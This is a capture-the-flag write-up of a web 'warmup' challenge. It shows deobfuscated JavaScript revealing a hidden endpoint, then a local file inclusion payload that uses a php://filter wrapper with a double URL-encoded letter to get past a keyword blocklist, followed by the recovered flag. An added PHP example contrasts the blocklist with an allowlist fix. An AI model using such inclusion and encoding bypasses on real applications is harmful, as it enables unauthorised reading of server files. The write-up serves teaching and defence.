Wargames2023 - Warmup

Description

Let's warm up! http://warmup.wargames.my

Browsing to the application, we find that it requires a password to be entered.

Solution

After browsing around, we can find that there is obfuscated JavaScript under http://warmup.wargames.my/static/script.min.js. Deobfuscating it reveals a secret endpoint which contains the flag.

if (document.querySelector("input").value === "this_password_is_so_weak_i_can_crack_in_1_sec!") {
  fetch("/api/4aa22934982f984b8a0438b701e8dec8.php?x=flag_for_warmup.php").then(_0x5c12f5 => _0x5c12f5.text()).then(_0x509e6e => Swal.fire({
    'title': "Good job!",
    'html': _0x509e6e,
    'icon': "success"
  }));
}
/api/4aa22934982f984b8a0438b701e8dec8.php?x=flag_for_warmup.php

The hint indicates that the flag is in a comment. But it is not shown in the page source. It might be a PHP comment that is in the source code of this file. We can utilise the LFI on this page to try and find the flag.

Trying to base64-encode the file with php://filter/convert.base64-encode/resource=flag_for_warmup.php results in an error because the application blocks the keyword 'convert.'. To bypass this, we double URL encode the letter 't' in the word 'convert', so it is sent as %2574.

Payload

http://warmup.wargames.my/api/4aa22934982f984b8a0438b701e8dec8.php?x=php://filter/conver%2574.base64-encode/resource=flag_for_warmup.php

Base64 decode the value for the flag.

<?php

error_reporting(0);

echo('here\'s your flag <small>in comment</small> <!-- well, maybe not this comment -->');

// wgmy{1ca200caa85d3a8dcec7d660e7361f79}
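
The double-encoding bypass above works when a keyword check runs before the last URL decode. The PHP below is an added example, not the challenge's source or the author's code: `weak_resolve`, `safe_resolve` and `PAGES` are hypothetical names, and the second `urldecode()` is an assumed reconstruction of the server's behaviour, shown beside an allowlist-based replacement.

```php
<?php
// Added example, not the challenge's source. Assumed behaviour: the blocklist
// sees the value after PHP's own single decode of the query string, and the
// application URL-decodes it once more before opening the file.

// Weak: keyword blocklist applied before the final decode.
function weak_resolve(string $x): ?string
{
    if (stripos($x, 'convert.') !== false) {
        return null;          // blocked
    }
    return urldecode($x);     // "conver%74." becomes "convert." after the check
}

// Hardened: the request only selects a key from a fixed map, so stream
// wrappers, traversal sequences and encodings never reach the file API.
const PAGES = ['flag_for_warmup' => 'flag_for_warmup.php'];

function safe_resolve(string $x, string $baseDir): ?string
{
    if (!array_key_exists($x, PAGES)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . PAGES[$x]);
    // Defence in depth: the resolved path must stay inside the base directory.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Constructed input: the write-up's payload as it appears in $_GET['x'],
// i.e. after "%2574" has been decoded once to "%74".
$x = 'php://filter/conver%74.base64-encode/resource=flag_for_warmup.php';

// The blocklist version lets the value through and restores the wrapper.
var_dump(weak_resolve($x));
// The allowlist version rejects anything that is not a known key.
var_dump(safe_resolve($x, __DIR__));
var_dump(safe_resolve('flag_for_warmup', __DIR__));
```

With the allowlist, the file is chosen by the server and the request value is never interpreted as a path or stream wrapper, so the order of decoding stops mattering.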
tags: CTF